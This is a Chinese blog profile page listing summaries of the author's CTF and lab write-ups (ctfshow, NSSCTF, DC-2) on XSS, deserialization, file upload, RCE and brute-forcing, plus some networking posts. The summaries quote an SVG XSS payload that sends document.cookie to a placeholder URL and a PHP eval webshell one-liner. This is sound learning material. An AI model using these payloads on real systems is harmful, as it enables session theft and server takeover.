自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(32)
  • 收藏
  • 关注

原创 CTFSHOW web入门 黑盒测试 web385-web388

本文总结了CTF题目中常见的几种Web漏洞利用方法:1. 通过删除安装锁文件lock.dat重置管理员密码;2. 利用路径穿越漏洞读取敏感文件;3. 通过日志文件注入PHP代码获取flag。关键技巧包括:分析安装流程、目录扫描发现敏感路径、利用文件包含漏洞读取日志文件、通过User-Agent注入恶意代码等。这些方法展示了如何绕过安全限制获取系统权限,最终读取flag文件内容。

2026-05-19 10:22:14 78

原创 CTFSHOW web入门 黑盒测试 web380-web384

本文摘要:通过CTF题目实战,展示了Web安全中的目录扫描、文件包含、SQL注入和密码爆破等技术。在web380-384系列题目中,利用dirsearch扫描目录发现关键文件,通过参数注入获取flag;在web381-383中,通过源代码分析找到隐藏路径,使用弱口令或SQL注入绕过登录;web384则结合题目提示编写脚本生成密码字典进行爆破。这些案例演示了常见Web漏洞的利用方法,包括信息收集、代码审计和自动化攻击等渗透测试技巧。

2026-05-17 21:01:51 498

原创 CTFSHOW web入门 XSS web329-web333

摘要:本文记录了5道CTF题目(web329-web333)的解题过程,主要利用存储型XSS漏洞。在web329中,通过XSS注入获取管理员cookie失败后,改用JavaScript动态创建表单提交整个页面源码,最终获取flag。web330和331通过XSS结合CSRF漏洞修改管理员密码。web332和333则利用XSS构造AJAX请求,向指定账户转账后购买flag。每道题目都详细展示了payload构造思路和关键代码实现,最终成功获取flag。

2026-05-17 21:00:17 349

原创 CTFSHOW web入门 XSS web327-web328

本文总结了web327和web328两道CTF题目的解题思路。web327考察存储型XSS漏洞利用,通过构造SVG标签的onload事件,将document.cookie外带到攻击者服务器获取flag。web328则需要通过注册页面的XSS注入窃取管理员cookie,再修改请求中的PHPSESSID实现权限提升。两道题目分别演示了存储型XSS攻击和会话劫持的实际应用,最终获取flag

2026-05-06 14:59:17 233

原创 CTFSHOW web入门 XSS web316-web326

本文详细记录了从web316到web326的XSS漏洞利用过程,通过多种注入方式(如script标签、HTML事件、SVG标签等)绕过过滤机制,成功窃取Cookie并获取flag。关键步骤包括:使用webhook.site和interactsh平台接收数据,构造payload如<svg onload='new Image().src="URL"+document.cookie'>实现隐蔽数据外带。最终通过URL解码获取各题的flag,例如ctfshow{7d81283a-8add-4967-b442-d5b

2026-05-06 14:57:04 736

原创 DC-2靶场渗透实战详细过程

本文详细记录了DC-2靶场渗透测试全过程。通过NAT网络设置后,首先进行信息收集,确定目标IP并扫描开放端口(80/http和7744/ssh)。利用wappalyzer识别CMS为WordPress 4.7.10,使用cewl生成字典后,通过wpscan枚举出用户admin、jerry和tom。爆破成功jerry和tom的凭证后,在WordPress后台获取flag1和flag2。根据提示通过SSH连接tom账户(7744端口),发现受限的rbash环境,使用vi命令逃逸并修复PATH后切换至jerry账

2026-04-10 21:01:47 488

原创 NSSCTF做题记录十二 | [GDOUCTF 2023]EZ WEB、[HNCTF 2022 Week1]2048、[SWPUCTF 2022 新生赛]1z_unserialize

本文汇总了多个CTF赛题的解题思路和flag获取方法,主要涉及以下技术点: Flask路由审计(通过PUT请求获取flag) JavaScript游戏分数验证(修改分数阈值触发flag) PHP反序列化漏洞利用(构造恶意对象执行系统命令) HTML表单限制绕过(修改maxlength属性) JavaScript混淆代码分析(通过控制台执行关键函数) 各题目均展示了典型的安全漏洞利用方式,包括信息收集、代码审计和参数篡改等技术,体现了CTF比赛中常见的Web安全考点。

2026-04-10 12:54:44 397

原创 NSSCTF做题记录十一 | [SDCTF 2022]Ishihara test++、[UUCTF 2022 新生赛]ez_rce、[GDOUCTF 2023]泄露的伪装

本文摘要了三道CTF题目解析:1. [SDCTF2022]Ishiharatest++通过修改SVG文件样式表中的颜色值(#000000黑色/#FFFFFF白色)获取flag,考察SVG隐写知识;2. [UUCTF2022]ez_rce利用反斜杠绕过PHP命令过滤(如l\s/等效于ls/),通过printf执行系统命令读取flag,涉及RCE和WAF绕过;3. [GDOUCTF2023]泄露的伪装使用data伪协议(data://text/plain,ctrl)满足条件获取flag,考察信息收集和PHP伪协

2026-04-07 21:26:23 533

原创 CTFSHOW web入门 反序列化 web256

本文展示了一个PHP反序列化漏洞利用案例。代码定义了一个ctfShowUser类,通过控制isVip属性可获取flag。攻击者构造恶意序列化对象:设置username='admin'、password='password'和isVip=true,通过Cookie传递该对象。当满足登录验证且isVip为true时,系统会输出flag。关键点在于绕过身份验证和VIP检查,最终成功获取flag:ctfshow{0a328664-3455-4a8f-865b-473c4fb136a8}。该案例演示了PHP反序列化漏

2026-04-07 21:23:38 50

原创 NSSCTF做题记录十 | [巅峰极客 2022 决赛]开端:strangeTempreture

摘要:该题目为流量分析题,涉及Modbus/TCP协议。解题关键是从TCP流中提取拼接的字母,进行Base64解码获得flag。核心知识点包括Modbus协议(工业控制通信协议)、寄存器(数据存储单元)和功能码(操作编号,如03读数据、06写数据)。解题时需注意特征:两个字母一组与其他内容隔开的情况。复盘发现需加强对Modbus协议的理解,特别是数据格式和功能码的识别。

2026-04-02 21:07:21 218

原创 CTFSHOW web入门 反序列化 web254-255

摘要:两段PHP代码审计题目展示了不同方式的漏洞利用。第一题(web254)通过直接传参匹配预定义的用户名密码即可获取flag。第二题(web255)引入了反序列化漏洞,通过构造恶意序列化对象并设置isVip为true,利用Cookie传参实现权限绕过。两题对比展示了从简单参数验证到反序列化漏洞的进阶利用,核心考点包括PHP代码审计、反序列化漏洞、客户端可控Cookie及对象属性伪造等安全知识。

2026-04-02 21:05:46 216

原创 NSSCTF做题记录九 | [HUBUCTF 2022 新生赛]checkin

摘要:本题是一个PHP反序列化漏洞利用题目,通过代码审计发现存在弱比较漏洞。关键点在于flag.php修改了$username和$password的值,而条件判断使用弱比较(==)。利用布尔类型true与非零非NULL变量比较都为True的特性,构造包含username和password都为true的序列化字符串a:2:{s:8:"username";b:1;s:8:"password";b:1;},通过GET参数info传递即可绕过验证获取flag。主要考察PHP代

2026-03-31 15:54:46 199

原创 NSSCTF做题记录八 | [SWPUCTF 2022 新生赛]ez_ez_php(revenge)、[NISACTF 2022]bingdundun~

本文总结了两道CTF题目的解题思路。第一道[SWPUCTF2022新生赛]ez_ez_php(revenge)考察PHP伪协议和代码审计,通过php://filter伪协议读取flag文件。第二道[NISACTF2022]bingdundun~涉及phar伪协议利用,通过构造phar压缩包并重命名为zip上传,再使用phar://协议执行命令获取flag。两题都展示了PHP伪协议在文件包含和命令执行中的应用,重点在于理解文件包含函数和phar协议的工作原理。解题关键点包括:代码审计确定过滤条件、伪协议构造技

2026-03-30 19:56:27 361

原创 NSSCTF做题记录七 | [NSSCTF 2022 Spring Recruit]babyphp、[LitCTF 2023]Vim yyds、[鹤城杯 2021]EasyP

摘要: 本文分析了三个CTF题目中的PHP代码审计技巧:1) babyphp考察了数组参数绕过函数检查和0e魔术哈希的弱比较绕过;2) Vimyyds通过vim恢复.swp文件获取源码,利用base64编码绕过密码验证实现命令执行;3) EasyP展示了通过畸形参数名和URL编码绕过正则检测的方法。三个案例分别涉及不同层级的PHP安全特性利用,包括类型转换、哈希比较、文件恢复和参数解析等核心知识点,为CTF中的PHP代码审计提供了典型解题思路。

2026-03-29 21:09:19 902

原创 NSSCTF做题记录六 | [SWPUCTF 2021 新生赛]finalrce、[UUCTF 2022 新生赛]websign、[HDCTF 2023]Welcome To HDCTF 2023、

本文总结了四个CTF题目的解题思路:1.[SWPUCTF2021]finalrce考察无回显命令执行,通过\绕过关键字过滤并使用管道符将输出写入文件;2.[UUCTF2022]通过view-source协议查看源码获取flag;3.[HDCTF2023]在JS游戏源码中找到JSFuck编码并在控制台解码;4.[HNCTF2022]利用文件包含漏洞,通过php伪协议读取base64编码的flag.php。解题关键在于代码审计、绕过技巧(如转义字符、伪协议)和源码分析,遇到include函数、过滤限制等情况应考

2026-03-29 21:05:25 475

原创 CTFshow Web 应用安全与防护 | Base64编码隐藏、HTTP头注入、Base64多层嵌套解码

摘要:本文介绍了三个CTF题目解法。1) Base64编码隐藏:在源码中找到Base64编码并解码获得flag;2) HTTP头注入:通过修改User-Agent请求头获取flag;3) Base64多层嵌套:分析JavaScript加密逻辑,编写脚本爆破密码后结合User-Agent修改获取flag。三个题目分别考察了信息收集、HTTP注入和代码审计能力,展示了从简单编码到复杂嵌套加密的解题过程。

2026-03-27 20:42:35 226

原创 NSSCTF做题记录五 | [SWPU 2019]漂流记的马里奥

该题目考查NTFS文件系统的隐藏数据流(ADS)特性。通过运行程序生成1.txt后,需使用特殊命令"notepad 1.txt:flag.txt"才能查看隐藏的flag内容"swupctf{ddg_is_cute}"。NTFS允许文件包含多个隐藏数据流,常规查看主文件时显示为空,但实际数据存储在附加流中。解题关键在于理解NTFS的ADS特性,使用":文件名"格式访问特定数据流。本题展示了Windows文件系统中利用NTFS流隐写信息的典型方法。

2026-03-27 20:36:41 32

原创 CTFSHOW web入门 爆破 web23

本文分析了一个PHP代码审计题目,通过GET请求传递token参数获取flag。解题关键点在于:要求token的MD5哈希值第2、15、18位字符相同且为1-9数字满足公式(x+x+x)/x=3,即第32位必须是3使用Python脚本爆破,发现token=422时满足条件最终获取flag:ctfshow{e67404be-9c37-4537-9f36-580ffdbe0a5e}

2026-03-26 21:29:45 24

原创 Burp使用时光标偏移|错位问题解决方法

摘要:使用Burp抓包时若出现选取目标与鼠标偏移的问题,可通过修改字体设置解决。具体方法为:进入右上角设置→Userinterface→Messageeditor,将字体更改为楷体16pt即可消除偏移现象。该操作能有效解决默认字体导致的鼠标定位不准问题。

2026-03-26 20:27:18 63

原创 NSSCTF做题记录四 | [鹏城杯 2022]简单包含、[UTCTF 2020]Basics(MISC)

本文摘要:[鹏城杯2022]简单包含:考察PHP伪协议和代码审计,利用php://input绕过WAF过滤,通过构造超长POST请求体突破strlen()限制,最终使用base64编码读取flag.php获取flag。[UTCTF2020]Basics(MISC):基础图片隐写题,通过十六进制编辑器或文本编辑器直接搜索即可发现隐藏在文件中的flag。关键知识点:PHP伪协议php://input读取原始POST数据strlen()函数计算字符串字节数图片隐写基础分析方法

2026-03-25 21:41:51 308

原创 NSSCTF做题记录三 | [LitCTF 2023]1zjs、[SWPUCTF 2021 新生赛]Mooooooooooorse、[SWPUCTF 2021 新生赛]easyupload3.0

摘要:本文记录了三个CTF题目的解题过程。1) 1zjs魔方游戏通过查看源码找到隐藏路径/f@k3f1ag.php,获取JSfuck编码后在控制台解码得到flag;2) Mooooooooooorse音频分析,使用Au工具提取摩斯密码解码后获得flag;3) easyupload3.0通过上传.htaccess文件使图片木马被解析为PHP,成功执行命令获取flag。三个题目分别考察了信息收集、音频隐写和文件上传漏洞利用。

2026-03-22 21:00:51 322

原创 NSSCTF做题记录二 | [SWPUCTF 2021 新生赛]PseudoProtocols、[LitCTF 2023]Follow me and hack me、[NCTF 2018]签到题

本文总结了多个CTF赛题解题思路,主要涉及PHP伪协议、文件包含、信息收集、RCE等知识点。通过分析题目源码和返回包,利用php://filter读取文件内容,使用data://协议绕过条件判断,以及数组绕过md5比较等技巧获取flag。同时展示了如何通过目录扫描、抓包修改请求等方式发现隐藏文件路径。文章还介绍了常用函数如file_get_contents()、substr()、include()的功能和使用场景,为CTF比赛中Web类题目的解题提供了实用参考。

2026-03-19 21:25:47 618

原创 NSSCTF做题记录一 | [领航杯江苏省赛 2021]签到题、[LitCTF 2023]我Flag呢?、[SWPUCTF 2021 新生赛]easyrce

本文总结了多个CTF比赛中Web类题目的解题思路,主要包括:1)通过修改字体颜色发现隐藏flag;2)源码查看获取flag;3)RCE漏洞利用(eval、system等函数执行系统命令);4)HTTP请求头伪造(User-Agent、X-Forwarded-For);5)Cookie伪造;6)文件上传绕过(后缀名、MIME类型);7)目录扫描发现敏感文件(phpinfo信息泄露)。这些题目考察了常见的Web安全漏洞利用技术,如命令注入、文件包含、权限绕过等,并展示了多种绕过防护措施的方法。

2026-03-18 21:24:25 661

原创 [SWPUCTF 2021 新生赛] | gift_F12、 easy_md5、 jicao 、include

本文总结了SWPUCTF2021新生赛中的几个CTF题目解法。1. gift_F12通过查看源代码直接获取flag;2. easy_md5利用数组绕过或MD5弱比较漏洞获取flag;3. jicao通过JSON传参满足条件获取flag;4. include使用PHP伪协议读取flag.php源码。文章详细分析了每道题的解题思路,涉及源代码查看、MD5比较漏洞、JSON解析、文件包含等知识点,并介绍了PHP伪协议和包含函数的使用方法,为CTF竞赛中的常见Web题型提供了参考解法。

2026-03-17 21:10:44 1030

原创 CTFHUB 文件上传 无验证

摘要:通过分析CTFHUB文件上传漏洞,发现网站使用PHP编写且未进行文件验证。上传包含<?php@eval($_POST["PASS"]);?>的webshell脚本muma.php后,利用蚁剑成功连接。在/var/www/html/flag_273511568.php中获取flag。该漏洞展示了未经验证的文件上传风险,攻击者可借此执行任意PHP代码,获取服务器控制权。关键知识点包括WebShell利用和eval()函数执行特性。

2026-03-16 21:30:33 76

原创 CTFSHOW WEB入门 爆破 web21

本文介绍了通过Burp Suite工具对网页登录进行爆破攻击的过程。首先抓取到使用Base64编码的认证信息"YWRtaW46YWRtaW4xMjM=",解码后为"admin:admin123"。在Intruder模块采用狙击手模式,将认证信息分为三部分处理:用户名、冒号和密码字典。对payload进行Base64编码并取消URL编码后实施爆破,最终成功获取正确密码"shark63",完成CTF挑战。整个过程中重点分析了认证信息的结构处理、payload设置和编码规则调整等关键步骤。

2026-03-16 21:26:18 245

原创 CTFshow web入门 web12-20

本文总结了多个CTF web题目的解题思路,主要涉及信息搜集和漏洞利用。常见方法包括:1)使用dirsearch进行目录扫描寻找敏感文件(如/admin、/backup.sql、/db.mdb);2)查看网页源代码寻找隐藏信息;3)利用默认或弱密码登录后台;4)通过探针文件(如tz.php)获取服务器信息;5)分析游戏源码或解密AES获取凭证。关键知识点包括HTTP状态码含义、常见文件类型(如.mdb数据库文件)和PHP探针功能。解题核心在于系统性地收集信息并验证各种可能性,如默认路径、常见漏洞和提示线索。

2026-03-13 21:10:56 1170

原创 CTFshow web入门 web1-10

本文总结了10个CTF Web题目解题方法,涉及多种信息泄露技术。主要包括:查看页面源代码获取flag(web1-2)、HTTP抓包分析响应头(web3)、robots.txt协议泄露(web4)、phps源码泄露(web5)、压缩包泄露(web6)、.git/.svn版本控制泄露(web7-8)、vim缓存文件泄露(web9)以及cookie分析(web10)。通过这些案例展示了常见的信息泄露漏洞,包括开发注释未删除、JS拦截绕过、服务器配置不当、备份文件泄露等安全风险,并介绍了相关工具如dirsearc

2026-03-12 20:38:39 448

原创 NAT44/NAT64/NAT66 之间的原理、区别与在真实应用场景

随着网络规模的扩大和 IPv4 地址资源的枯竭,NAT(网络地址转换)逐渐成为支撑互联网持续运行的重要技术。本文从工程实践的角度,系统梳理了 NAT44、NAT64 与 NAT66 三种 NAT 形态的工作原理、设计背景及典型应用场景。通过对比分析可以看出:NAT44 是解决 IPv4 地址不足的历史产物;NAT64 是 IPv6 向 IPv4 过渡阶段的关键桥梁;而 NAT66 则是一种在特定约束下的工程妥协方案。文章进一步结合真实网络环境,探讨了各类 NAT 在实际部署中的优势、限制及对网络架构的影响,

2025-12-30 21:52:10 1309

原创 关于网络设备 CPU、pps 以及控制平面防护的理解

PPS(每秒报文数)是衡量CPU处理网络数据包压力的关键指标,与带宽单位不同,它直接影响控制平面性能。网络设备CPU主要负责协议处理、表项维护和管理运维,而非数据转发。小包攻击危害大,因高PPS会频繁中断CPU。控制平面防护的核心是限制异常报文对CPU的冲击,而非带宽。网络架构分核心层(高速转发)、汇聚层(策略执行)和接入层(用户接入),各层防护重点不同。保护CPU稳定性对维持全网稳定至关重要。

2025-12-24 01:05:38 816

原创 radio->VAP->BSSID->SSID:无线网络是如何真正运转的

摘要:VAP(虚拟无线接口)是WIFI网络中真正处理业务数据的实体,而非SSID(WIFI名称)。每个VAP拥有独立的无线接口、MAC地址和数据转发功能,负责数据解封装、VLAN标记等处理。终端通过BSSID(VAP的MAC)而非SSID接入网络,即使SSID相同,不同VAP的BSSID也不同。Radio决定频段(2.4G/5G),VAP决定业务类型,并通过Beacon帧广播SSID和BSSID。AP通过在不同频段绑定不同VAP实现双频服务,终端通过BSSID区分同名SSID.

2025-12-23 19:37:48 304

原创 从 GRE 隧道到 OSPFv3 再到 WAF:一次打通网络连通、路由与安全策略的实践总结

本文系统总结了网络与安全实践中的关键技术点:1. GRE隧道技术原理及应用,包括点对点特性、配置方法及与动态路由协议的配合使用;2. OSPFv2与OSPFv3的核心区别,重点解析了IPv6 Link-Local地址的建邻机制和Router-ID设置;3. 安全策略中单一IP地址的掩码判断原则,强调在WAF/防火墙场景下应优先采用/32掩码。文章通过实际案例,阐述了这些技术在真实网络环境中的协同应用,为网络与安全实践提供了系统性的技术参考。

2025-12-17 11:57:16 637 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除